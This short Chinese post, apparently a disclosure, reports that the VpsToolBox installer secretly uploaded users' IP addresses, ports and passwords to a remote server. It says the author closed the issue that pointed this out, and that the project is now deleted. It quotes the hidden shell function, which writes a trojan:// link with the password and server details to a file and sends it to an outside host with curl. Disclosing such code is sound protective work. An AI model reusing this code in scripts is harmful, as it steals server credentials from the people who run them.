v2ex上有用户发帖指VpsToolBox存在恶意代码,会将用户的IP、端口、密码上传至远程服务器。
曾有用户提出 issue 指出该恶意代码,但被作者直接关闭了issue。
相关代码:
clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}
目前VpsToolBox已是删除状态。
v2ex帖子地址:https://www.v2ex.com/t/928400
VpsToolBox快照:https://web.archive.org/web/20230330025849/https://github.com/johnrosen1/vpstoolbox
